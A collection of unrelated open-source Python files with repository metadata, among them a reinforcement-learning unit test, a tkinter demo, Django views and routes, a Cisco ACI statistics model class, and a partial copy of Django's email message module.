b5f06531dbe3c04664346f6cfd8fbd90c85fa5b5 | 9adc810b07f7172a7d0341f0b38088b4f5829cf4 | /tests/test_continuous_memory_augmented.py | 5eb4373d630b344ea3e657bd6e5768e045be776a | [
"MIT"
]
| permissive | Asap7772/railrl_evalsawyer | 7ee9358b5277b9ddf2468f0c6d28beb92a5a0879 | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | refs/heads/main | 2023-05-29T10:00:50.126508 | 2021-06-18T03:08:12 | 2021-06-18T03:08:12 | 375,810,557 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | import unittest
import numpy as np
from rlkit.envs.memory.continuous_memory_augmented import (
ContinuousMemoryAugmented,
)
from rlkit.envs.memory.one_char_memory import OneCharMemory
from rlkit.testing.np_test_case import NPTestCase
class TestContinuousMemoryAugmented(NPTestCase):
def test_dim_correct(self):
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
self.assertEqual(env.action_space.flat_dim, 16)
def test_memory_action_saved(self):
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
env.reset()
env_action = np.zeros(6)
env_action[0] = 1
memory_written = np.random.rand(10)
action = [env_action, memory_written]
_, saved_memory = env.step(action)[0]
self.assertNpArraysEqual(memory_written, saved_memory)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
e721b0da6badeaacbd866a2f0a8a7aaba7ede2c4 | 773300eda3f26141a8cbf8259688c15978e5fdff | /collect_data/collect_emb_AE.py | 8e26b6ed01d859faeec1ac580d59e392170302bb | []
| no_license | ver228/worm-ts-classification | 96601c0f579a4d8f110cb6307ff59f8eb7620657 | 6d4d6b6f04e05a93baea7a5a7550a7a180b60c94 | refs/heads/master | 2021-10-28T15:28:27.098510 | 2019-04-24T07:36:35 | 2019-04-24T07:36:35 | 179,681,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 15 13:04:37 2018
@author: avelinojaver
"""
from pathlib import Path
import sys
src_d = Path(__file__).resolve().parents[1]
sys.path.append(str(src_d))
from worm_ts_classification.path import _root_dirs
from embeddings_helper import calculate_embeddings
from collect_emb_CeNDR import get_video_info_from_files
import pandas as pd
import os
def get_video_info_from_csv_agg(root_dir):
csv_path = str(Path.home() / 'workspace/WormData/screenings/Serena_WT_Screening/metadata_aggregation_screening.csv')
bad_labels = ['NONE']
video_info = pd.read_csv(csv_path)
video_info['dirname'] = video_info['dirname'].str.replace('/Volumes/behavgenom_archive\$/Serena/AggregationScreening/MaskedVideos/', '')
video_info = video_info.rename(columns={'strain_name':'strain', 'dirname':'file_path'})
video_info = video_info[~video_info['strain'].isin(bad_labels)]
fnames = root_dir + '/' + video_info['file_path'] + '/'+ video_info['basename'].str.replace('.hdf5', '_featuresN.hdf5')
is_valid = [os.path.exists(x) for x in fnames.values]
video_info = video_info[is_valid]
fnames = [Path(x) for e, x in zip(is_valid,fnames.values) if e]
return video_info, fnames
#%%
if __name__ == '__main__':
p = 'osx' if sys.platform == 'darwin' else 'centos_oxford'
root = _root_dirs[p]
set_type = 'CeNDR'
emb_set = 'AE2DWithSkels32_emb32_20180620'
root_dir = root + 'experiments/autoencoders/embeddings/CeNDR_ROIs_embeddings/20180620_173601_AE2DWithSkels32_skel-1-1_adam_lr0.001_batch16'
video_info, fnames = get_video_info_from_files(root_dir, f_ext = '_embeddings.hdf5')
save_file = root + 'experiments/classify_strains/{}_{}.hdf5'.format(set_type, emb_set)
calculate_embeddings(video_info,
fnames,
emb_set,
save_file,
col_label = 'roi_index',
embeddings_field = '/embeddings')
| [
"[email protected]"
]
| |
9d56718b4ded959a49e3dd8e775bd8bfc29122d7 | aa1e01857c2e02b711e1b748d79016377bcbf3f6 | /6. Chapter Tuples in Python (Immutable)/10_copyingatuples.py | 2e7c5c01186c35e359f73a0e0883fc984ccac6fb | []
| no_license | jaishivnani/Python-Practice-Problems | 3d6b64aca93d28bc479f21845e878b0cc2b037fb | 46d82b276cb46d61cd0acac507cc92b4707e5456 | refs/heads/main | 2023-01-22T23:06:48.309872 | 2020-12-05T14:13:26 | 2020-12-05T14:13:26 | 303,448,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | '''Copying a tuple'''
# tuple1 = (11, 22, 33, 44, 55, 66)
#
#
# tuple2 = tuple1[3:-1]
#
# print(tuple2)
| [
"[email protected]"
]
| |
3f70e4050ad4153565dab180bdd8ab482046c135 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/proc/applicationcpu1h.py | 4d97a761604ed5974688854c702e052311e1b6a7 | []
| no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 11,475 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ApplicationCPU1h(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.proc.ApplicationCPU1h", "Application CPU utilization")
counter = CounterMeta("current", CounterCategory.GAUGE, "percentage", "Application CPU usage")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "currentLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "currentMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "currentMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "currentAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "currentSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "currentTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "currentThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "currentTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "currentTr"
meta._counters.append(counter)
meta.moClassName = "procApplicationCPU1h"
meta.rnFormat = "CDprocApplicationCPU1h"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Application CPU utilization stats in 1 hour"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.proc.App")
meta.parentClasses.add("cobra.model.proc.Container")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.proc.ApplicationCPU")
meta.rnPrefixes = [
('CDprocApplicationCPU1h', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "currentAvg", "currentAvg", 30345, PropCategory.IMPLICIT_AVG)
prop.label = "Application CPU usage average value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentAvg", prop)
prop = PropMeta("str", "currentLast", "currentLast", 30342, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Application CPU usage current value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentLast", prop)
prop = PropMeta("str", "currentMax", "currentMax", 30344, PropCategory.IMPLICIT_MAX)
prop.label = "Application CPU usage maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMax", prop)
prop = PropMeta("str", "currentMin", "currentMin", 30343, PropCategory.IMPLICIT_MIN)
prop.label = "Application CPU usage minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMin", prop)
prop = PropMeta("str", "currentSpct", "currentSpct", 30346, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Application CPU usage suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("currentSpct", prop)
prop = PropMeta("str", "currentThr", "currentThr", 30348, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Application CPU usage thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("currentThr", prop)
prop = PropMeta("str", "currentTr", "currentTr", 30350, PropCategory.IMPLICIT_TREND)
prop.label = "Application CPU usage trend"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTr", prop)
prop = PropMeta("str", "currentTrBase", "currentTrBase", 30349, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Application CPU usage trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTrBase", prop)
prop = PropMeta("str", "currentTtl", "currentTtl", 30347, PropCategory.IMPLICIT_TOTAL)
prop.label = "Application CPU usage total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTtl", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
]
| |
35b0d2a44b219d072fe73f45c05ade42fa4faf2c | 8d9c17a9773fe9e38ba4d3ff65ab3a71360fbc1f | /ch11/ch11.2/questions.py | b13ecee09a854672c4eefa08c3dec2aea3a5cb95 | []
| no_license | kwr0113/Intro_Python | 3529bee454950875fb63ceb99e7f402201091ab6 | 2326d1e2b1f07fac7b3a3054fd13d8ea70d92ba9 | refs/heads/master | 2023-06-09T08:55:02.502842 | 2021-06-25T05:56:16 | 2021-06-25T05:56:16 | 353,600,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 112 | py |
from choice import fast, advice
print("Let's go to", fast.pick())
print("Should. we take out?", advice.give()) | [
"[email protected]"
]
| |
042d8b627f884b675c421f5924b25125dbd9ba28 | 344e44fd1caa2976daa11429bf57a949e6b824de | /lesson4/Win_Entry.py | 51ebb606d841eb9531eb9097072c1f528a2afdec | []
| no_license | vincenttuan/ntnu_python | 621bc23c6b7443fde9d9975f6a98226ddec3c42a | e1361518ab69bf8064d38efccb743fcc9b4dd4b5 | refs/heads/master | 2020-12-15T06:23:27.338319 | 2020-02-05T07:37:09 | 2020-02-05T07:37:09 | 234,856,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import random
import tkinter
from tkinter import messagebox
def get():
messagebox.showinfo("Hello Python", entry.get())
def set():
entry.delete(0, tkinter.END)
entry.insert(0, str(random.randint(1, 100)))
win = tkinter.Tk()
entry = tkinter.Entry(win, justify=tkinter.CENTER)
entry.config(font=('Arial', 40))
entry.insert(0, "hello")
entry.insert("end", "world")
entry.insert(5, ", ")
entry.pack()
button1 = tkinter.Button(win, text="Get", command=get)
button1.config(font=('Arial', 30))
button1.pack(side=tkinter.LEFT)
button2 = tkinter.Button(win, text="Set", command=set)
button2.config(font=('Arial', 30))
button2.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"[email protected]"
]
| |
3e58c1bd8bb2ce83eff77c6b6415588b37ace5ee | 161dcb4b1f3939231728e91a8129a2571842d23a | /unit_12/mysite/page/views.py | b717f1ce9a72e4c7c54642a51138da7f81962296 | []
| no_license | bm1120836/21-python | 3162896e1b9e41d57c4249ea5f3bcaf06eef0361 | 8924f9b53e68b08f9203f48b215ea5b3a420d075 | refs/heads/master | 2023-05-03T16:11:42.864607 | 2015-10-01T13:26:29 | 2015-10-01T13:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request,'pages/index.html', {})
def about(request):
mydict = {'title': 'Over and over I keep going over the world we knew'}
return render(request,'pages/about.html', mydict) | [
"[email protected]"
]
| |
2702973ff7a17bed0d48b32a62ace7da4711edf1 | 5f957add3e3f7a1885d4f1b106de72e93c8fcb1a | /ExerciciosPython/ex104.py | 3553a22823ba1a045866075009e6c26bace8337e | [
"MIT"
]
| permissive | mpatrickaires/curso-python | 6e32cf785a3bc0076bb3ea24cd6d896604f4e774 | aba023648527d53bfe18833b91210a7e528a84d7 | refs/heads/main | 2022-12-27T00:57:07.467940 | 2020-10-14T00:48:09 | 2020-10-14T00:48:09 | 302,203,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def leiaInt(msg):
num = str(input(msg))
while not num.strip('-').isnumeric():
print('\033[1;31mERRO! Digite um número válido.\033[m')
num = input(msg)
num = int(num)
return num
# Programa Principal
n = leiaInt('Digite um número: ')
print(f'Você acabou de digitar o número {n}')
| [
"[email protected]"
]
| |
2064b14b6a814eb78b1b5e02c449821f5678c3f3 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/adamant.py | 1fae335b579f8f57ee4132e01c1630fe476896ba | []
| no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('adamant', __name__, url_prefix='/adamant')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
| [
"[email protected]"
]
| |
e9f664051e1cd44334bed76437d2bc6d1b9406fb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/2c58ac18335d9ccde20b181d76eafa8246a3add2-<get_dict_of_struct>-bug.py | c1b04ce9a26065e77e20d7fb780cf6950f112efa | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,532 | py |
def get_dict_of_struct(connection, vm):
'\n Transform SDK Vm Struct type to Python dictionary.\n '
if (vm is None):
return dict()
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
vm_service = vms_service.vm_service(vm.id)
devices = vm_service.reported_devices_service().list()
tags = vm_service.tags_service().list()
stats = vm_service.statistics_service().list()
labels = vm_service.affinity_labels_service().list()
groups = clusters_service.cluster_service(vm.cluster.id).affinity_groups_service().list()
return {
'id': vm.id,
'name': vm.name,
'host': (connection.follow_link(vm.host).name if vm.host else None),
'cluster': connection.follow_link(vm.cluster).name,
'status': str(vm.status),
'description': vm.description,
'fqdn': vm.fqdn,
'os_type': vm.os.type,
'template': connection.follow_link(vm.template).name,
'tags': [tag.name for tag in tags],
'affinity_labels': [label.name for label in labels],
'affinity_groups': [group.name for group in groups if (vm.name in [vm.name for vm in connection.follow_link(group.vms)])],
'statistics': dict(((stat.name, stat.values[0].datum) for stat in stats)),
'devices': dict(((device.name, [ip.address for ip in device.ips]) for device in devices)),
'ansible_host': (devices[0].ips[0].address if (len(devices) > 0) else None),
}
| [
"[email protected]"
]
| |
ed6013412f56c3d8d36b040db1926b7dbe4df1ac | 48a647031af30b93b332001544b258a787542c6f | /venv/chapter_14/class_3.py | 2436a321ca8a0127db83bc6d111881405f3e1be4 | []
| no_license | Adminsys-debug/xdclass_python | 3d3f37f7812336aa79bf9dc0d990658c67156057 | c2e82b750c5337045b07c19a0c9ead5c3752b3a7 | refs/heads/master | 2022-05-20T07:10:33.396655 | 2020-04-18T05:40:48 | 2020-04-18T05:40:48 | 256,659,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/31 15:34
# @Author : mr.chen
# @File : class_3
# @Software: PyCharm
# @Email : [email protected]
# 多态特性和构造函数
class Person:
# 构造函数
def __init__(self, name, age, height):
print("这是一个初始化操作")
self.name = name
self.age = age
self.height = height
def introduce_self(self):
print("hello,my name is %s and my age is %d and i.m %d height" % (self.name, self.age, self.height))
person = Person("Admin_sys", 27, 172)
person2 = Person("Admin_sys", 28, 173)
person.introduce_self()
person2.introduce_self()
| [
"[email protected]"
]
| |
6dfc0b14ac75334fd342c8fa9823d30c170f81a5 | 30ab9750e6ca334941934d1727c85ad59e6b9c8a | /zentral/contrib/santa/api_urls.py | 93f78fcb7f41f3f7a75739e197ec40139f839f52 | [
"Apache-2.0"
]
| permissive | ankurvaishley/zentral | 57e7961db65278a0e614975e484927f0391eeadd | a54769f18305c3fc71bae678ed823524aaa8bb06 | refs/heads/main | 2023-05-31T02:56:40.309854 | 2021-07-01T07:51:31 | 2021-07-01T14:15:34 | 382,346,360 | 1 | 0 | Apache-2.0 | 2021-07-02T12:55:47 | 2021-07-02T12:55:47 | null | UTF-8 | Python | false | false | 404 | py | from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
from .api_views import IngestFileInfo, RuleSetUpdate
app_name = "santa_api"
urlpatterns = [
url('^ingest/fileinfo/$', IngestFileInfo.as_view(), name="ingest_file_info"),
url('^rulesets/update/$', RuleSetUpdate.as_view(), name="ruleset_update"),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"[email protected]"
]
| |
7981c80ab526d512232ccda263ec7800e95f8da9 | d65128e38be0243f279e0d72ef85e7d3c5e116ca | /base/site-packages/django/core/mail/message.py | a3b36df832c89756073b44e96883bb6bf14c4a1b | [
"Apache-2.0"
]
| permissive | ZxwZero/fastor | 19bfc568f9a68f1447c2e049428330ade02d451d | dd9e299e250362802032d1984801bed249e36d8d | refs/heads/master | 2021-06-26T06:40:38.555211 | 2021-06-09T02:05:38 | 2021-06-09T02:05:38 | 229,753,500 | 1 | 1 | Apache-2.0 | 2019-12-23T12:59:25 | 2019-12-23T12:59:24 | null | UTF-8 | Python | false | false | 13,545 | py | from __future__ import unicode_literals
import mimetypes
import os
import random
import sys
import time
from email import charset as Charset, encoders as Encoders
from email.generator import Generator
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.header import Header
from email.utils import formatdate, getaddresses, formataddr, parseaddr
from django.conf import settings
from django.core.mail.utils import DNS_NAME
from django.utils.encoding import force_text
from django.utils import six
# Don't BASE64-encode UTF-8 messages so that we avoid unwanted attention from
# some spam filters.
Charset.add_charset('utf-8', Charset.SHORTEST, None, 'utf-8')
# Default MIME type to use on attachments (if it is not explicitly given
# and cannot be guessed).
DEFAULT_ATTACHMENT_MIME_TYPE = 'application/octet-stream'
class BadHeaderError(ValueError):
pass
# Copied from Python standard library, with the following modifications:
# * Used cached hostname for performance.
# * Added try/except to support lack of getpid() in Jython (#5496).
def make_msgid(idstring=None):
"""Returns a string suitable for RFC 2822 compliant Message-ID, e.g:
<[email protected]>
Optional idstring if given is a string used to strengthen the
uniqueness of the message id.
"""
timeval = time.time()
utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(timeval))
try:
pid = os.getpid()
except AttributeError:
# No getpid() in Jython, for example.
pid = 1
randint = random.randrange(100000)
if idstring is None:
idstring = ''
else:
idstring = '.' + idstring
idhost = DNS_NAME
msgid = '<%s.%s.%s%s@%s>' % (utcdate, pid, randint, idstring, idhost)
return msgid
# Header names that contain structured address data (RFC #5322)
ADDRESS_HEADERS = set([
'from',
'sender',
'reply-to',
'to',
'cc',
'bcc',
'resent-from',
'resent-sender',
'resent-to',
'resent-cc',
'resent-bcc',
])
def forbid_multi_line_headers(name, val, encoding):
"""Forbids multi-line headers, to prevent header injection."""
encoding = encoding or settings.DEFAULT_CHARSET
val = force_text(val)
if '\n' in val or '\r' in val:
raise BadHeaderError("Header values can't contain newlines (got %r for header %r)" % (val, name))
try:
val.encode('ascii')
except UnicodeEncodeError:
if name.lower() in ADDRESS_HEADERS:
val = ', '.join(sanitize_address(addr, encoding)
for addr in getaddresses((val,)))
else:
val = Header(val, encoding).encode()
else:
if name.lower() == 'subject':
val = Header(val).encode()
return str(name), val
def sanitize_address(addr, encoding):
if isinstance(addr, six.string_types):
addr = parseaddr(force_text(addr))
nm, addr = addr
# This try-except clause is needed on Python 3 < 3.2.4
# http://bugs.python.org/issue14291
try:
nm = Header(nm, encoding).encode()
except UnicodeEncodeError:
nm = Header(nm, 'utf-8').encode()
try:
addr.encode('ascii')
except UnicodeEncodeError: # IDN
if '@' in addr:
localpart, domain = addr.split('@', 1)
localpart = str(Header(localpart, encoding))
domain = domain.encode('idna').decode('ascii')
addr = '@'.join([localpart, domain])
else:
addr = Header(addr, encoding).encode()
return formataddr((nm, addr))
class SafeMIMEText(MIMEText):
def __init__(self, text, subtype, charset):
self.encoding = charset
MIMEText.__init__(self, text, subtype, charset)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEText.__setitem__(self, name, val)
def as_string(self, unixfrom=False):
"""Return the entire formatted message as a string.
Optional `unixfrom' when True, means include the Unix From_ envelope
header.
This overrides the default as_string() implementation to not mangle
lines that begin with 'From '. See bug #13433 for details.
"""
fp = six.StringIO()
g = Generator(fp, mangle_from_ = False)
if sys.version_info < (2, 6, 6) and isinstance(self._payload, six.text_type):
# Workaround for http://bugs.python.org/issue1368247
self._payload = self._payload.encode(self._charset.output_charset)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
class SafeMIMEMultipart(MIMEMultipart):
def __init__(self, _subtype='mixed', boundary=None, _subparts=None, encoding=None, **_params):
self.encoding = encoding
MIMEMultipart.__init__(self, _subtype, boundary, _subparts, **_params)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEMultipart.__setitem__(self, name, val)
def as_string(self, unixfrom=False):
"""Return the entire formatted message as a string.
Optional `unixfrom' when True, means include the Unix From_ envelope
header.
This overrides the default as_string() implementation to not mangle
lines that begin with 'From '. See bug #13433 for details.
"""
fp = six.StringIO()
g = Generator(fp, mangle_from_ = False)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
class EmailMessage(object):
"""
A container for email information.
"""
content_subtype = 'plain'
mixed_subtype = 'mixed'
encoding = None # None => use settings default
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, cc=None):
"""
Initialize a single email message (which can be sent to multiple
recipients).
All strings used to create the message can be unicode strings
(or UTF-8 bytestrings). The SafeMIMEText class will handle any
necessary encoding conversions.
"""
if to:
assert not isinstance(to, six.string_types), '"to" argument must be a list or tuple'
self.to = list(to)
else:
self.to = []
if cc:
assert not isinstance(cc, six.string_types), '"cc" argument must be a list or tuple'
self.cc = list(cc)
else:
self.cc = []
if bcc:
assert not isinstance(bcc, six.string_types), '"bcc" argument must be a list or tuple'
self.bcc = list(bcc)
else:
self.bcc = []
self.from_email = from_email or settings.DEFAULT_FROM_EMAIL
self.subject = subject
self.body = body
self.attachments = attachments or []
self.extra_headers = headers or {}
self.connection = connection
def get_connection(self, fail_silently=False):
from django.core.mail import get_connection
if not self.connection:
self.connection = get_connection(fail_silently=fail_silently)
return self.connection
def message(self):
encoding = self.encoding or settings.DEFAULT_CHARSET
msg = SafeMIMEText(self.body, self.content_subtype, encoding)
msg = self._create_message(msg)
msg['Subject'] = self.subject
msg['From'] = self.extra_headers.get('From', self.from_email)
msg['To'] = self.extra_headers.get('To', ', '.join(self.to))
if self.cc:
msg['Cc'] = ', '.join(self.cc)
# Email header names are case-insensitive (RFC 2045), so we have to
# accommodate that when doing comparisons.
header_names = [key.lower() for key in self.extra_headers]
if 'date' not in header_names:
msg['Date'] = formatdate()
if 'message-id' not in header_names:
